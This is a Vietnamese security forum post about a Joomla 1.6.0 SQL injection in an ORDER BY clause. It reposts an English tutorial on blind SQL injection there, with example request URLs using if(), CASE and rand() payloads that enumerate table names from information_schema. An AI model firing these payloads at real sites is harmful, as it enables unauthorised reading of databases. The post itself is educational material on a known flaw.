[Article] Khai thác SQL injection tại mệnh đề ORDER BY |
19/03/2011 16:53:18 (+0700) | #1 | 233526 |
|
xnohat
Moderator
|
Joined: 30/01/2005 13:59:19
Messages: 1210
Location: /dev/null
Offline
|
|
Hôm nay có một lỗi mới của Joomla 1.60 , lỗi SQL injection
http://www.securityfocus.com/bid/46846/exploit
Thế nhưng lỗi này nằm tại một mệnh đề ORDER BY
Unknown column 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' in 'order clause' SQL=SELECT a.id, a.title, a.alias, a.title_alias, a.introtext, a.catid, a.created, a.created_by, a.created_by_alias, CASE WHEN a.modified = 0 THEN a.created ELSE a.modified END as modified, a.modified_by, uam.name as modified_by_name,CASE WHEN a.publish_up = 0 THEN a.created ELSE a.publish_up END as publish_up, a.publish_down, a.attribs, a.metadata, a.metakey, a.metadesc, a.access, a.hits, a.xreference, a.featured, LENGTH(a.fulltext) AS readmore ,CASE WHEN badcats.id is not null THEN 0 ELSE a.state END AS state,c.title AS category_title, c.path AS category_route, c.access AS category_access, c.alias AS category_alias,CASE WHEN a.created_by_alias > ' ' THEN a.created_by_alias ELSE ua.name END AS author,ua.email AS author_email,contact.id as contactid,parent.title as parent_title, parent.id as parent_id, parent.path as parent_route, parent.alias as parent_alias,ROUND( v.rating_sum / v.rating_count ) AS rating, v.rating_count as rating_count,c.published, CASE WHEN badcats.id is null THEN c.published ELSE 0 END AS parents_published FROM anh_content AS a LEFT JOIN anh_content_frontpage AS fp ON fp.content_id = a.id LEFT JOIN anh_categories AS c ON c.id = a.catid LEFT JOIN anh_users AS ua ON ua.id = a.created_by LEFT JOIN anh_users AS uam ON uam.id = a.modified_by LEFT JOIN anh_contact_details AS contact on contact.user_id = a.created_by LEFT JOIN anh_categories as parent ON parent.id = c.parent_id LEFT JOIN anh_content_rating AS v ON a.id = v.content_id LEFT OUTER JOIN (SELECT cat.id as id FROM anh_categories AS cat JOIN anh_categories AS parent ON cat.lft BETWEEN parent.lft AND parent.rgt WHERE parent.extension = 'com_content' AND parent.published != 1 GROUP BY cat.id ) AS badcats ON badcats.id = c.id WHERE a.access IN (1,1) AND CASE WHEN badcats.id is null THEN a.state ELSE 0 END = 1 AND (a.publish_up = '0000-00-00 00:00:00' OR a.publish_up <= '2011-03-19 10:48:10') AND (a.publish_down = '0000-00-00 00:00:00' OR a.publish_down >= '2011-03-19 10:48:10') ORDER BY AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA , 2, c.lft, fp.ordering, a.created ASC LIMIT 4, 3
Việc tấn công do đó không theo các phương thức khai thác SQL injection thông thường. Hướng SQL injection Blind là hướng khả quan để khai thác
Tham khảo bài viết dưới đây để rõ về cách khai thác SQL injection tại mệnh đề ORDER BY
eXploiting SQL injection in ORDER BY clause (MySQL 5)
by Jacco van Tuijl
This URL will show a list orderd by column 1 :
http://www.test.com/list.php?orderby=1
This is what the SQL query that is executed on the database might look like:
SELECT id,name,price FROM list ORDER BY 1
If it would be vulnerable to SQL injection we could try :
http://www.test.com/list.php?orderby=if(true,id,price)
and
http://www.test.com/list.php?orderby=if(false,id,price)
to see if they give a different result
or
http://www.test.com/list.php?orderby=(select case when (true) then id else price end)
and
http://www.test.com/list.php?orderby=(select case when (true) then id else price end)
to see if they give a different result.
If they do give a different result you might be able to enumerate the first char of the table_name in information_schema.tables like this:
http://www.test.com/list.php?orderby=if((select char(substring(table_name,1,1)) from information_schema.tables limit 1)<=128),id,price)
and this:
http://www.test.com/list.php?orderby=(select case when ((select char(substring(table_name,1,1)) from information_schema.tables limit 1)<=128) then id else price end)
The backside of these methods is that they require knowlage of the column names.
So I worked out some different method that doesn't require knowlage about column names.
ORDER BY rand()
We can make a request like this:
http://www.test.com/list.php?orderby=rand(true)
returns a different result then this request:
http://www.test.com/list.php?orderby=rand(false)
We can use it to enumerate the first char of the table_name in information_schema.tables like this:
http://www.test.com/list.php?orderby=rand((select char(substring(table_name,1,1)) from information_schema.tables limit 1)<=12
And it is all quoteless!
Greetingz,
Jacco van Tuijl
Original Article: http://2600nl.net/2010/05/29/exploiting-sql-injection-in-order-by-clause-mysql-5/ |
|
iJust clear, "What I need to do and how to do it"/i
br
brBox tán gẫu dời về: http://www.facebook.com/hvaonline |
|
|
|
|
|
|
Users currently in here |
1 Anonymous
|
|
Powered by JForum - Extended by HVAOnline
hvaonline.net | hvaforum.net | hvazone.net | hvanews.net | vnhacker.org
1999 - 2013 ©
v2012|0504|218|
|
|